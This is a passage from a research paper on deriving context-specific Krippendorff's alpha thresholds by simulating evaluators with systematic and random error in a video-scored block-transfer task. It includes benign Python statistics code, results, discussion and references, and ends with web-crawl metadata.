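    # 1 / (m_u - 1) = 1 when there are two raters per unit.
    observed = 2.0 * ratio_delta_sq(ref, sim).sum()

    # Denominator: expected coincidences over every pairing of pooled values
    # (the sum over c and k of n_c * n_k * delta_ck^2).
    pooled = np.concatenate([ref, sim])
    expected = ratio_delta_sq(pooled[:, None], pooled[None, :]).sum()

    return 1.0 - (n - 1) * observed / expected

def percent_error(theoretical, experimental):
    # Percent error of Eq. (5), e.g., applied to the summed speed-phase time.
    return abs(theoretical - experimental) / theoretical * 100.0
```

Applying `krippendorff_alpha_ratio` to each simulated dataset against the reference, and `percent_error` to the summed durations of the 50 speed-phase events, yields the (agreement, error) pairs from which the model is built.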
### Model assessment

We wanted to verify that our model accurately described the relationship between the agreement and error of actual human evaluators, and also to demonstrate the applicability of the model in a real-world scenario. We first fit a curve ($$y = -0.637x^{1.76} + 1$$, $$r^2 = 0.999$$; the curve was created using the Igor Pro v6.36 curve fitting function; WaveMetrics, Portland, OR) to the model, using the data points of the simulated evaluators who defined the envelope, to mathematically define what would be the "worst-case" percent error for any given Krippendorff's alpha value (see Results). A power law was chosen for the curve fit as it provided a high $$r^2$$ for the envelope over the range of data that we were interested in. This is, again, a facet of the methodology that is dependent on the evaluator task; our methods are generalizable to allow any form of curve fitting.
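Characterizing the envelope requires only a standard fitting routine; for instance, a brief Python sketch using `scipy.optimize.curve_fit` fits the same power-law form. The envelope points below are placeholder values, not our actual data.

```
import numpy as np
from scipy.optimize import curve_fit

def power_law(x, a, b, c):
    # Same functional form as the reported envelope fit: y = a * x**b + c
    return a * np.power(x, b) + c

# Placeholder (alpha, worst-case error) envelope points; in practice these
# would be the simulated-evaluator points that define the envelope.
alpha_env = np.array([0.86, 0.90, 0.94, 0.97, 0.99])
error_env = np.array([0.51, 0.47, 0.43, 0.40, 0.37])

(a, b, c), _ = curve_fit(power_law, alpha_env, error_env, p0=(-0.64, 1.8, 1.0))

# Worst-case error permitted by a candidate agreement threshold:
worst_case_at_threshold = power_law(0.985, a, b, c)
```

Evaluating the fitted curve at a candidate threshold then gives the worst-case error that the threshold would permit, which is how a contextually relevant cutoff can be chosen.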
We then compared the results of the hypothetical modeling to an actual population of evaluators to demonstrate that the model values reflect the values actually generated by human evaluators. To do this, we assigned the video analysis task to a new cohort of trained human evaluators (n = 5). We used the reference dataset from our panel of expert evaluators (described above) as a standard of comparison and calculated Krippendorff's alpha and percent error values for each of the human evaluators to verify their compliance with the model.

Since the test data that were used to generate the model were also the same data that the evaluators were scoring, it was a concern that any comparisons between the evaluators and the model were circular and not generalizable to new instances of the test. To explore this idea, we repeated all of the simulation steps using a new scoring video of a different anonymous participant taking the same test, scored by a new evaluator. All error step-sizes, error calculations, and agreement calculations were methodologically identical to the original simulation described in "Quantitative example." We again plotted the results of the human evaluators from the original video analysis to see if they were still well-explained by the new model, as well as fit a curve to the new envelope ($$y = -0.6251x^{1.685} + 1.001$$, $$r^2 = 0.9998$$) to determine if there was any change between the two models in the mathematical relationship between agreement and error.

## Results

The Krippendorff's alpha values for the 4900 hypothetical datasets ranged from 0.998 to 0.854, and the percent error values ranged from 0 to 39.4%. Figure 3 shows the average Krippendorff's alpha and average percent error of all 49 (averaged) simulated evaluators, with the size and shading of the markers representing the random error and systematic error parameters, respectively. For our evaluator task, an increase in systematic error was correlated with an increase in percent error (Pearson's r = 0.997, p < 0.001), whereas random zero-mean error did not correlate with an increase in percent error (Pearson's r = −0.025, p = 0.865). This was a result of our task being specifically concerned with average percent error; simulated evaluators with zero-mean random error produced modest percent error when averaged over many trials. As seen in Fig. 3, this result was also evidenced by darker circles falling farther to the right, with larger circles of the same color aligning vertically. As mentioned above, flooring our measurements to 0.033 s introduced a small amount of systematic error into simulated evaluators who were prescribed low systematic error and high random error. This can be seen in Fig. 3, as the markers with increasing random error are staggered to the right when systematic error is low. This deviance was not a concern for our specific investigation, as we were only interested in the envelope of the model.

### Model assessment

To verify that our model accurately described the evaluator agreement and measurement error relationship of actual human evaluators, we plotted the Krippendorff's alpha and percent error values collected from our human evaluators against the performance of the simulated evaluators. We found that the results of the human evaluators fell within the envelope defined by the simulated evaluator performance (Fig. 4).

Figure 5 shows the model created using the results of the new trained evaluator analyzing this new instance of the block moving task. The original fit from the model in Fig. 4 still provides an accurate description of the Krippendorff's alpha and percent error relationship ($$r^2 = 0.991$$). The lighter dotted line is the new fit ($$y = -0.6251x^{1.685} + 1.001$$, $$r^2 = 0.9998$$) and is provided for comparison. The two models are highly similar, and are nearly identical when considering percent errors of 10% or less. Both models show high agreement and low error for the six tightly clustered evaluators, who would pass any of the example Krippendorff's alpha thresholds presented, and one evaluator who has relatively low agreement and excessively high error that would not pass any of the thresholds.

## Discussion

When measuring agreement between evaluators, a decision about what constitutes an acceptable level of agreement must be made. Historically, interpreting an agreement measure was ambiguous, as the practical implications of choosing one threshold over another were not well-defined. This led to general use of a 0.8 "rule of thumb" value as a threshold, though several works have suggested that this cut-off is not likely suitable for all studies [4, 10, 13, 14, 15, 16]. To address this issue, we developed a systematic approach to arrive at a relevant context-specific reliability threshold, bridging the gap between reliability indices and the error inherent to the test construct of interest. Our approach simulated the results of a large population of evaluators. In our quantitative example, these simulated evaluators "judged" a video analysis task. Our method injected known tendencies for making systematic and random errors, and calculated the agreement (Krippendorff's alpha in our example) and the error (percent error in our example) between the simulated data and a reference dataset. This procedure allowed us to relate agreement, which is customarily measured in reliability studies, to the amount of error from the "true" values, which is more salient but typically unavailable. In our example, we found that an envelope existed which defined the maximum observed percent error for any given value of Krippendorff's alpha. We characterized this envelope and determined its effectiveness and generalizability.

During the evaluation of our quantitative example, we found that the results of the human evaluators adhered to the derived threshold envelope and were similar to those obtained from the simulated data (Fig. 4). As evidenced through this quantitative example, these findings support that our proposed techniques have the power to facilitate meaningful interpretations of reliability indices in a relevant context of measurement error. An additional characteristic of our quantitative example is highlighted in Fig. 6. Here, the contour plots, generated using the simulated datasets, show Krippendorff's alpha (left) and percent error (right) values for the investigated combinations of systematic error and random error. It was demonstrated that an increase in either systematic error or random error can lead to a decrease in agreement (lower Krippendorff's alpha), whereas percent error (the "functional value"), on average, is only affected by systematic error. This is due to the mathematical nature of random observational errors (and thus how they were modeled), as they are described by symmetrical deviations with no net change from the mean of a Gaussian distribution; therefore, they average to zero over many trials [27]. This contour plot format can be more generally applied to other reliability indices or measures of error to illustrate the consequences of observational errors.

Finally, the data highlighted in Fig. 5 were generated from a new participant being scored by a new evaluator to verify the generalizability of our techniques.
The only observed difference between this newly generated model and the original was that the contour plots (not shown) of Krippendorff's alpha and percent error were compressed, as the values from the second test were, on average, numerically smaller than those of the first test. This means that systematic error and random error had relatively greater effects on Krippendorff's alpha and percent error. Regardless, the Krippendorff's alpha and percent error relationship generated by this model remained a valid and useful way to assess evaluator reliability in this video analysis task. This was evidenced by re-plotting the human evaluators on the new model, as they fell within similar error and agreement thresholds as in the original model (Fig. 5). These data suggest that once a relationship between a selected reliability index and functional measure has been established, that result is generally applicable to any instance of that same test, scored by any cohort of evaluators, without need to revisit the model.

This example demonstrates the use of our systematic procedure to both investigate the consequences of different agreement thresholds and provide a framework for researchers to make informed decisions about reliability in their evaluator-based tests. Modeling a large population of evaluators with a variety of prescribed probabilities for making mistakes and then calculating their resulting error allowed us to describe our chosen agreement measure in the context of how the data would be used practically. In our example, we generated a standard of comparison for this specific instance of our test by employing a group of expert evaluators. Comparing the experts' results to the trained evaluators' results revealed practicable levels of agreement and the error associated with that agreement. We found that high levels of agreement (0.99 and up) were regularly achieved and afforded error of no greater than 5%. Using our model as a frame of reference, we concluded that a Krippendorff's alpha threshold of 0.985 should be used for this task to permit error no greater than 12% while not being so strict as to potentially throw out useful data. It is critical to note that the conventional 0.8 rule-of-thumb threshold would have been egregiously permissive in our quantitative example, further reinforcing the need for application-specific agreement thresholds.

A key strength of our methodology is its high level of customizability, which greatly expands its scope and utility. This procedure should be applicable to most any agreement measure or evaluator-based task, and may be uniquely tailored to emphasize the important aspects of the task or to reflect how the data will be used in practice. The investigator may choose the step-size of the simulated evaluators' errors and the approach for calculating error (using percent error or a different error calculation entirely, calculating error on individual values or averaged values, etc.) beforehand, based on the specific needs of that test. Additionally, the investigator is able to decide how the "true" or reference data that are used for calculating agreement and error are defined or generated. It should be noted that the presence of true or even presumably-true values is not necessary for using this method, and the values used to generate the model are not even required to be actual results from the specific test of interest.
The only requirement for these reference data is that they are representative of the types of values resulting from an evaluator judging the specific test. In our quantitative example, the error step-size was chosen to be the resolution of the measurements of the test (based on the video frame rate). We used percent error calculations from a subset of the measurements which represented a particular metric of interest. We determined this metric to be the most sensitive to error, so using it for our calculations provided us with a worst-case percent error for any given level of agreement. The "true" or reference values were established by averaging together the results of the expert evaluators.

Our methodology may provide a useful framework for establishing agreement benchmarks in evaluator-based tests, and could be adapted for application in other contexts. For example, the reliability of clinical tests which require human evaluation is a major concern. The accuracy and validity of these types of assessments could be improved by using our methodology. To implement our methods more generally in a clinical context (or other evaluator-based applications), a possible approach would be first building a "true" or reference set of measurements for a typical application of the test. A baseline panel of expert evaluators could be employed to generate the reference measurement(s) for that particular application. Modeling a simulated evaluator population from this dataset would establish an agreement-error relationship that could be used as a "grading scale," relating evaluator quality (inter-evaluator reliability) and measurement error, that would generally apply in any instance of that test. This process would only need to be performed once, and the resulting scale could then be incorporated into training programs for new evaluators or used to periodically assess groups of existing evaluators as a measure of quality control.

Perhaps the biggest limitation of this work is that the models generated are inherently more accurate when the reference data are of similar numerical magnitude to the data typically obtained from the testing procedure. Although a "one size fits all" solution would be ideal, multiple models may be necessary if the results of the evaluator task vary greatly. For instance, in our quantitative example, video footage of a healthy participant transferring objects with their upper limbs was scored. If this task were performed with a sensorimotor-impaired participant, where scores would be anticipated to differ significantly from healthy performance, it may be necessary to generate a new model built from reference data that are more reflective of the anticipated sensorimotor-impaired results. Further work could be done to investigate the consistency of models over different ranges of numerical values and how, and to what extent, the models diverge from the data. This methodology could potentially reveal strengths and weaknesses of different reliability indices and possibly inform the selection of an appropriate agreement measure. Our approach of using zero-mean random error may present as a limitation, as it is an idealized circumstance. This zero-mean approach could perhaps be replaced with a more nuanced approach exploring the skew and kurtosis of error distributions to potentially reveal additional findings.
Skew and kurtosis may have the potential to model more peculiar erroneous evaluator behavior, such as heavy-tailed outlier data, which could be approximated by increased kurtosis. A particularly troublesome example would be an evaluator who occasionally selects extreme values in an asymmetric fashion to intentionally bias the outcome of an evaluation. Our methodology could be used to model what this behavior looks like from a reliability perspective, to help detect and mitigate this type of behavior in the field.

This work aims to provide a generalizable procedure, yet datasets in evaluator-based scoring activities may be diverse in size, variability, and data type. Thus, it is not feasible to devise a universal procedure which can accommodate all possible variants of reliability data. As such, each individual application of this methodology requires the discretion of the investigator. Furthermore, this method could reasonably apply to many data types (e.g., nominal, interval, ratio), error measurements (e.g., percent error, RMS error, mean absolute error), and reliability indices (e.g., Cohen's κ, Scott's π, Krippendorff's α). We suggest that the quantitative basis of this method represents an improvement over rule-of-thumb conventions for interpreting reliability indices.

## Conclusion

By simulating a population of evaluators with predetermined probabilities for making mistakes, we have explored correlations between evaluator reliability indices and functional test values of interest. We demonstrate this method using a quantitative example to derive a relationship between Krippendorff's alpha and percent error. Through this simulation and modeling we assessed the quality of our human evaluators based on their alpha coefficients. We propose that this is a reasonable technique for establishing agreement thresholds to identify suitable evaluators, and this technique could be expanded for use in other evaluator-based tests, or with different agreement and/or error measurements.

## References

1. Feng GC. Factors affecting intercoder reliability: a Monte Carlo experiment. Qual Quant. 2013;47:2959–82.
2. Antoine J-Y, Villaneau J, Lefeuvre A. Weighted Krippendorff's alpha is a more reliable metrics for multi-coders ordinal annotations: experimental studies on emotion, opinion and coreference annotation. In: Proc 14th Conf Eur Chapter Assoc Comput Linguist; 2014. p. 550–9. http://www.aclweb.org/anthology/E14-1058.
3. Krippendorff K. Content analysis: an introduction to its methodology. Beverly Hills: Sage Publications; 1980.
4. Craggs R, Wood MM. Evaluating discourse and dialogue coding schemes. Comput Linguist. 2005;31:289–96.
5. Hayes AF, Krippendorff K. Answering the call for a standard reliability measure for coding data. Commun Methods Meas. 2007;1:77–89. https://doi.org/10.1080/19312450709336664.
6. Oleinik A, Popova I, Kirdina S, Shatalova T. On the choice of measures of reliability and validity in the content-analysis of texts. Qual Quant. 2014;48:2703–18.
7. Krippendorff K. Agreement and information in the reliability of coding. Commun Methods Meas. 2011;5:93–112.
8. Bartlett JW, Frost C. Reliability, repeatability and reproducibility: analysis of measurement errors in continuous variables. Ultrasound Obstet Gynecol. 2008;31:466–75.
9. Lombard M, Snyder-Duch J, Bracken CC. Content analysis in mass communication: assessment and reporting of intercoder reliability. Hum Commun Res. 2002;28:587–604.
2002;28:587–604.\n\n10. 10.\n\nKrippendorff K. Reliability in content analysis: some common misconceptions and recommendations. Hum Commun Res. 2004;30:411–33.\n\n11. 11.\n\nBanerjee M, Capozzoli M, McSweeney L, Sinha D. Beyond kappa: a review of interrater agreement measures. Can J Stat. 1999;27:3–23. https://doi.org/10.2307/3315487.\n\n12. 12.\n\nZwick R. Another look at interrater agreement. Psychol Bull. 1988;103:374–8.\n\n13. 13.\n\nArtstein R, Poesio M. Inter-coder agreement for computational linguistics. Comput Linguist. 2008;34:555–96. https://doi.org/10.1162/coli.07-034-R2.\n\n14. 14.\n\nCarletta J. Squibs and discussions: assessing agreement on classification tasks: the kappa statistic. Comput Linguist. 1996;22(2):249–54.\n\n15. 15.\n\nEugenio BD, Glass M. The kappa statistic: a second look. Comput Linguist. 2004;30:95–101. https://doi.org/10.1162/089120104773633402.\n\n16. 16.\n\nReidsma D, Carletta J. Reliability measurement without limits. Comput Linguist. 2008;34:319–26. https://doi.org/10.1162/coli.2008.34.3.319.\n\n17. 17.\n\nWilhelm AG, Rouse AG, Jones F. Exploring differences in measurement and reporting of classroom observation inter-rater reliability. Pract Assess Res Eval. 2018;23:1–16.\n\n18. 18.\n\nStilma W, Rijkenberg S, Feijen H, Maaskant JM, Endeman H. Validation of the Dutch version of the critical-care pain observation tool. Br Assoc Crit Care Nurses. 2015; Epub ahead of print.\n\n19. 19.\n\nvan Veen MJ, Birnie E, Poeran J, Torij HW, Steegers EAP, Bonsel GJ. Feasibility and reliability of a newly developed antenatal risk score card in routine care. Midwifery. 2015;31:147–54. https://doi.org/10.1016/j.midw.2014.08.002.\n\n20. 20.\n\nRohan KJ, Rough JN, Evans M, Ho SY, Meyerhoff J, Roberts LM, et al. A protocol for the Hamilton Rating Scale for Depression: item scoring rules, rater training, and outcome accuracy with data on its application in a clinical trial. J Affect Disord. 2016;200:111–8. https://doi.org/10.1016/j.jad.2016.01.051.\n\n21. 21.\n\nSwanton AR, Arlen AM, Alexander SE, Kieran K, Storm DW, Cooper CS. Inter-rater reliability of distal ureteral diameter ratio compared to grade of VUR. J Pediatr Urol. 2017;13:207.e1–207.e5. https://doi.org/10.1016/j.jpurol.2016.10.021.\n\n22. 22.\n\nWikstrom EA, Allen G. Reliability of two-point discrimination thresholds using a 4-2-1 stepping algorithm. Somatosens Mot Res. 2016;33:156–60.\n\n23. 23.\n\nDe Groef A, Van Kampen M, Vervloesem N, Clabau E, Christiaens MR, Neven P, et al. Inter-rater reliability of shoulder measurements in middle-aged women. Physiotherapy. 2017;103:222–30. https://doi.org/10.1016/j.physio.2016.07.002.\n\n24. 24.\n\nKvistgaard Olsen J, Fener DK, Wæhrens EE, Wulf Christensen A, Jespersen A, Danneskiold-Samsøe B, et al. Reliability of pain measurements using computerized cuff algometry: a DoloCuff Reliability and Agreement Study. Pain Pract. 2017;17:708–17.\n\n25. 25.\n\nSaito Y, Sozu T, Hamada C, Yoshimura I. Effective number of subjects and number of raters for inter-rater reliability studies. Stat Med. 2006;25:1547–60.\n\n26. 26.\n\nWalter SD, Eliasziw M, Donner A. Sample size and optimal designs for reliability studies. Stat Med. 1998;17:101–10.\n\n27. 27.\n\nTaylor JR. An introduction to error analysis: the study of uncertainties in physical measurements. 2nd ed. Sausalito: University Science Books; 1997.\n\n28. 28.\n\nHahn GJ. Sample sizes for Monte Carlo simulation. IEEE Trans Syst Man Cybern. 1972;2:678–80.\n\n29. 
29.\n\nCassettari L, Mosca R, Revetria R. Monte Carlo simulation models evolving in replicated runs: a methodology to choose the optimal experimental sample size. Math Probl Eng. 2012;2012:1–17.\n\n30. 30.\n\nKrippendorff K. Computing Krippendorff’s alpha-reliability. Dep Pap. 2011;1–12. https://repository.upenn.edu/cgi/viewcontent.cgi?article=1043&context=asc_papers.\n\n31. 31.\n\nFreelon D. ReCal OIR: ordinal, interval, and ratio intercoder reliability as a web service. Int J Internet Sci. 2013;8:10–6. http://www.ijis.net/ijis8_1/ijis8_1_freelon.pdf.\n\n## Acknowledgments\n\nWe thank Jon Sensinger for input on the manuscript.\n\n### Funding\n\nThis project utilized block transfer metrics and video footage that was developed with funding from the US taxpayers through Defense Advanced Research Projects Agency (DARPA) contract number N66001–15-C-4015 under the auspices of Biology Technology Office (BTO) program manager Doug Weber.\n\n### Availability of data and materials\n\nAll relevant data are contained within the paper and are freely available without restriction.\n\n## Author information\n\nAuthors\n\n### Contributions\n\nDTB contributed to data collection and analysis. ZCT and PDM contributed to analyses. All authors contributed to writing the manuscript. All authors read and approved the final manuscript.\n\n### Corresponding author\n\nCorrespondence to Paul D. Marasco.\n\n## Ethics declarations\n\n### Ethics approval and consent to participate\n\nThis modeling project was undertaken to improve internal processes for establishing reliability of evaluators and deemed not subject to IRB review. The block transfer metrics and video footage of fully consented study participants were covered by Cleveland Clinic IRB approved study 13–1349 Sensory Feedback Tactor Systems for Implementation of Physiologically Relevant Cutaneous Touch and Proprioception with Prosthetic Limbs.\n\n### Consent for publication\n\nInformed consent for the Cleveland Clinic IRB approved study 13–1349 Sensory Feedback Tactor Systems for Implementation of Physiologically Relevant Cutaneous Touch and Proprioception with Prosthetic Limbs includes consent for publication.\n\n### Competing interests\n\nThe authors declare that they have no competing interests.\n\n### Publisher’s Note\n\nSpringer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.\n\n## Rights and permissions",
null,
""
] | [
null,
"https://bmcmedresmethodol.biomedcentral.com/track/article/10.1186/s12874-018-0606-7",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.9055183,"math_prob":0.8871007,"size":53936,"snap":"2020-45-2020-50","text_gpt3_token_len":10962,"char_repetition_ratio":0.17141956,"word_repetition_ratio":0.02684729,"special_character_ratio":0.20285153,"punctuation_ratio":0.11902298,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95063394,"pos_list":[0,1,2],"im_url_duplicate_count":[null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-25T11:26:20Z\",\"WARC-Record-ID\":\"<urn:uuid:95c6407d-fdcd-49cf-a3ed-a2e031eb4af0>\",\"Content-Length\":\"264393\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:96ffa30e-c741-4118-a14d-c84d0d3bf081>\",\"WARC-Concurrent-To\":\"<urn:uuid:6a3a1ca0-e489-4b26-8cf0-c1f840dea7dd>\",\"WARC-IP-Address\":\"199.232.64.95\",\"WARC-Target-URI\":\"https://bmcmedresmethodol.biomedcentral.com/articles/10.1186/s12874-018-0606-7\",\"WARC-Payload-Digest\":\"sha1:FIWNTTELCGX7NFSALUAO3ILH5JJ6YXLP\",\"WARC-Block-Digest\":\"sha1:HDZJO7AB7JZKDJVIWWUVCV4PXFROLJWL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107888931.67_warc_CC-MAIN-20201025100059-20201025130059-00259.warc.gz\"}"} |
https://solvedlib.com/n/2-points-a-drug-x27-concentration-in-a-patient-x27-s-blood,8408817 | [
"The number of \"destination weddings\" has skyrocketed in recent years. For example, many couples are opting to have their weddings in the Caribbean. A Caribbean vacation resort recently advertised in Bride Magazine that the cost of a Caribbean wedding was less than $30,000. Listed below is ... 1 answer ##### (14) 1. This problem investigates the iterated integral I - Jxdy dz. . a) Compute I. b) Use the a... Please show all work thanks (14) 1. This problem investigates the iterated integral I - Jxdy dz. . a) Compute I. b) Use the axes to the right to sketch the region of integration for I c) Write I as a sum of one or more dz dy integrals. You do not need to compute the result! 4 (10) 2. Find and classi... 5 answers ##### Question 5) (20 Points) a) Given the vectors 4 =3i-j +kand B = 2i - 3j + k Calculate the product A x B and verify that this vector is Orthogonal to A vector and to B vector. Also find B x A and compare it with AxB_6)4=(-3,4,0),B=(3,6,3) and C = (-1,2,1) are the three vertices of a triangle Calculate the cosine of each of the three angles in the trtangle Calculate the area of the triangle Question 5) (20 Points) a) Given the vectors 4 =3i-j +kand B = 2i - 3j + k Calculate the product A x B and verify that this vector is Orthogonal to A vector and to B vector. Also find B x A and compare it with AxB_ 6)4=(-3,4,0),B=(3,6,3) and C = (-1,2,1) are the three vertices of a triangle Calculat... 1 answer ##### Could someone help me out. I am not sure what I should be doing. Seeing it... Could someone help me out. I am not sure what I should be doing. Seeing it worked out will allow me to understand what I should be doing and then I can complete it on my own. Usando 2. Complete the Dog Class: a. Using the UML Class diagram to the right declare the instance variables. A t... 1 answer ##### “Should individuals and small businesses run their own accounts, or should they leave it to the... “Should individuals and small businesses run their own accounts, or should they leave it to the professionals?”... 1 answer ##### Determine the amplitude, period, and phase shift of each function. Then graph one period of the function. $y=\\frac{1}{2} \\cos \\left(3 x+\\frac{\\pi}{2}\\right)$ Determine the amplitude, period, and phase shift of each function. Then graph one period of the function. $y=\\frac{1}{2} \\cos \\left(3 x+\\frac{\\pi}{2}\\right)$... 5 answers ##### If 2 =-1+ V3i find the value of (22 using De Moivre's Theorem: If 2 =-1+ V3i find the value of (22 using De Moivre's Theorem:... 5 answers ##### 9. 2t) In2 In 10. n=] n + 12 I\" 11. n=1 (3n)!(33 ~ 1)n 12. n2 + 2 n=l 9. 2t) In 2 In 10. n=] n + 1 2 I\" 11. n=1 (3n)! (33 ~ 1)n 12. n2 + 2 n=l... 1 answer ##### My question relates to Example 2.4, Section 3 (The Harmonic Oscillator) in the textbook Introduction to... My question relates to Example 2.4, Section 3 (The Harmonic Oscillator) in the textbook Introduction to Quantum Mechanics by DavidJ. Griffiths. My problem is with the normalization of of the following equation: |A|^2 \\sqrt{\\frac{m\\omega}{\\pi\\hbar} (\\frac{2m\\omega}{\\hbar})\\int_{-infty}^\\infty x^2 e^\\... 
5 answers ##### Chapter Sactlon 0.2, Quastion 087 Fipd antadetivativc Tor 9() 2sin< ~ sin(2c)= Aacac dilcrentiation chkrk Your LaswctRcrcmbct cuclor argutricnt, for tnporoneinc Iunctlona Paichthasi; Ind utc Tw mulplicutic'n Ixtwte Icnn: For ctleple _ nnul 3an_ Su J\"din(3t,An muikknvilnvc / Qt) Chapter Sactlon 0.2, Quastion 087 Fipd antadetivativc Tor 9() 2sin< ~ sin(2c)= Aacac dilcrentiation chkrk Your Laswct Rcrcmbct cuclor argutricnt, for tnporoneinc Iunctlona Paichthasi; Ind utc Tw mulplicutic'n Ixtwte Icnn: For ctleple _ nnul 3an_ Su J\"din(3t, An muikknvilnvc / Qt)... 1 answer ##### 1. (Bonds) A zero-coupon bond has a$1,000 par value, 10 years to maturity, and sells...\n1. (Bonds) A zero-coupon bond has a $1,000 par value, 10 years to maturity, and sells for$583.89. What is its yield to maturity? Assume annual compounding. Record your answer to the nearest 0.01% (no % symbol). E.g., if your answer is 3.455%, record it as 3.46. 2. (Stocks) A stock with the required...\n##### Kaecn pulled Aloni the Broundat con tantspeed (static €qullibrium) vl opc uelcd M 32\" above ua Uueee bonron5n belng pulled wlth 1P0 N the coctficient = klnetic Iriction 0,87.whal [s thie mwenllude 0l thc torce & uchrane0n0nS07NO5N0 502N\nKaecn pulled Aloni the Broundat con tantspeed (static €qullibrium) vl opc uelcd M 32\" above ua Uueee bonron5n belng pulled wlth 1P0 N the coctficient = klnetic Iriction 0,87.whal [s thie mwenllude 0l thc torce & uchrane 0n 0n S07N O5N 0 502N...\n##### 15. Let the supply and demand of radial tires be given by: supply: p and demand:...\n15. Let the supply and demand of radial tires be given by: supply: p and demand: p 81- a) Find the equilibrium quantity. 2 b) Find the equilibrium price...\n##### 3.2.42 Assigned MediaQuestion HelpBy rewiting the lormula for the Mulliplicatior Rule, you can wnte Iormula Ior linling conditional probabilities The conditional probability ol evert B occurring: given that event A has occurred, I5 P(B| A)- PAA, and Use Ihe intormation below to lind the probability that flight arnves on brrie given that it departed P(A) on timneThe probabllity that an airplane flight departs on tirre I5 0 89 The probability thal a flight arnives on time I5 0 86. The probab lity\n3.2.42 Assigned Media Question Help By rewiting the lormula for the Mulliplicatior Rule, you can wnte Iormula Ior linling conditional probabilities The conditional probability ol evert B occurring: given that event A has occurred, I5 P(B| A)- PAA, and Use Ihe intormation below to lind the probabilit...\n##### Convert the following DFA to a regular expression. Dead state and transitions to it not shown,...\nConvert the following DFA to a regular expression. Dead state and transitions to it not shown, but remember that the dead state has no outgoing transitions. ...\n##### 3. Compute the cooling load for the south windows of an office building that has no external shad...\n3. Compute the cooling load for the south windows of an office building that has no external shading. The window is regular insulating glass with 1/2 inch air space and Wood/Vinyl frame. Drapes with reflectance of 0.2 and transmittance of 0.5 are fully closed. The total window area is 400ft2. Assume...\n##### In Exercises 5 - 16, determine whether the sequence is geometric. If so, find the common ratio. $7, 21, 63, 189, \\cdots$\nIn Exercises 5 - 16, determine whether the sequence is geometric. If so, find the common ratio. 
$7, 21, 63, 189, \\cdots$...\n##### 388 I 2 1 L 6 & 3 28 1 8 2 2 1 8 18 3 6 3 1\n388 I 2 1 L 6 & 3 28 1 8 2 2 1 8 18 3 6 3 1...\n##### Please show all work and step by step procedure What is the net force on change...\nplease show all work and step by step procedure What is the net force on change B? F = kq_1 q_2/r_12^2 r_12 k = 1/4 pi epsilon_0 = 8.99 x 10^9 n.m^2/c^2...\n##### (1 point) Findwhenlog(x) 9 + Tog(x)d\n(1 point) Find when log(x) 9 + Tog(x) d...\n##### Find the area of the bounded region lying between the curves y 22 and y 4x x2\nFind the area of the bounded region lying between the curves y 22 and y 4x x2...\n##### That their items have normally distributed lifespan with a mean 0l 14.8 years, and A manufacturer knows standard deviation of years randomly purchase one item, what is the probability it will last (onger than 8 years? You\nthat their items have normally distributed lifespan with a mean 0l 14.8 years, and A manufacturer knows standard deviation of years randomly purchase one item, what is the probability it will last (onger than 8 years? You...\n##### The enthalpy of combustion of CH4(g) to make H2O(l) and CO2(g) is -2340 kJ mol-1. The...\nthe enthalpy of combustion of CH4(g) to make H2O(l) and CO2(g) is -2340 kJ mol-1. The enthalpy of combustion of CH2(g) to make H2O(l) and CO2(g) is -2760 kJ mol-1. The enthalpy of formation of H2O(l) is -286 kJ mol-1. All the data are for 298 K. The heat capacities for O2(g), CHA(8), CH3(g), H2O(l) ...\n##### Background: 100 ms after the participant makes an er investigate whether the ERN is affected The...\nBackground: 100 ms after the participant makes an er investigate whether the ERN is affected The Error-Related Negativity (ERN) is a negative ERP component a negative ERP component that peaks around 80- me participant makes an error Chan Davies & Gavin (2009) Wanted (ADHD). They compared a group...\n##### Find parametric equation for the line through the point (9, 8,6) and perpendicular to the plane 4x + 3y 9z = 13 which is written using the coordinates of the given point and the coefficients of x, Y; and z in the given equation of the plane.(Type expressions using t as the variable.\nFind parametric equation for the line through the point (9, 8,6) and perpendicular to the plane 4x + 3y 9z = 13 which is written using the coordinates of the given point and the coefficients of x, Y; and z in the given equation of the plane. (Type expressions using t as the variable....\n##### (25 pts. Use the Laplace transform to solve the initial value problem: ~4t+3. 0 <t<2 \"\"+4y=f()-{ J(0) =-1, y(0) = 5, t22\n(25 pts. Use the Laplace transform to solve the initial value problem: ~4t+3. 0 <t<2 \"\"+4y=f()-{ J(0) =-1, y(0) = 5, t22...\n##### Id\"F One property of Laplace transforms can be expressed in terms of the inverse Laplace transform...\nId\"F One property of Laplace transforms can be expressed in terms of the inverse Laplace transform as 2-1 (t) = (-t)\"f(t), where f= 2-1{F}. Use this equation to compute 2 - '{F} dsh F(s) = arctan on to Click here to view the table of Laplace transforms. Click here to view the table of pr...\n##### Question 10 Not yet answeredFind the cumulative frequency of tall in the third class boundary? Frequency part of Survey ( Male students tall in ASU Spring 0-21) 25 1 20 15 20 6 10 15 1 MToal 159.5-164.5 164.5-169.5 169.5-174.5 174.5-179.5 179.5-184.5 Hight of studentMarked out of 2.00Flag questionDataAnswer:\nQuestion 10 Not yet answered Find the cumulative frequency of tall in the third class boundary? 
Frequency part of Survey ( Male students tall in ASU Spring 0-21) 25 1 20 15 20 6 10 15 1 Total 159.5-164.5 164.5-169.5 169.5-174.5 174.5-179.5 179.5-184.5 Height of student Marked out of 2.00 Flag questio..."
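Several of the excerpts above are answerable in one or two lines. For instance, the zero-coupon bond question ($1,000 face value, 10 years to maturity, price $583.89, annual compounding) reduces to a single formula; a sketch follows (the 5.53% figure comes from the formula below, not from the site's hidden answer):

```python
# Zero-coupon pricing with annual compounding: P = F / (1 + y)^n,
# so y = (F / P)**(1 / n) - 1.
face, price, years = 1000.0, 583.89, 10
ytm = (face / price) ** (1.0 / years) - 1.0
print(f"{ytm:.2%}")   # ~5.53%, i.e. record 5.53 in the answer format requested
```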
] | [
null
